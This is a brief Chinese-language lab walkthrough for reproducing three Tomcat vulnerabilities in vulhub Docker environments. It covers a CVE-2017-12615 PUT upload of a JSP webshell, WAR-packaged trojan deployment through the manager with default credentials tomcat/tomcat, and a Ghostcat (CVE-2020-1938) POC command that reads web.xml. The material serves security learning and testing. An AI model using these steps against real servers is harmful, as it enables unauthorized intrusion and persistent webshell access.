一.CVE-2017-12615

环境搭建

cd vulhub-master/tomcat/CVE-2017-12615

docker-compose up -d

漏洞复现

http://172.16.1.22

1.⾸⻚抓包，修改为 PUT ⽅式提交

PUT /shell.jsp/

2.上传成功进行访问，使用Webshell客户端⼯具进⾏连接 

 

二.后台弱口令部署war包

环境搭建 8

cd vulhub-master/tomcat/tomcat8

docker-compose up -d

漏洞复现 http://172.16.1.22:8080/manager/html

默认密码:tomcat/tomcat

1.制作WAR包

制作WAR包，将JSP⽊⻢压缩为ZIP格式，然后修改后缀为war就可以了。

2. ⽂件上传成功后，默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录，然后⽬录中得⽊⻢就是压缩 前的⽂件名。 http://172.16.1.22:8080/1/1.jsp

三.CVE-2020-1938

环境搭建

cd vulhub-master/tomcat/CVE-2020-1938

docker-compose up -d

POC: python 111.py -p 8009 -f /WEB-INF/web.xml 172.16.1.22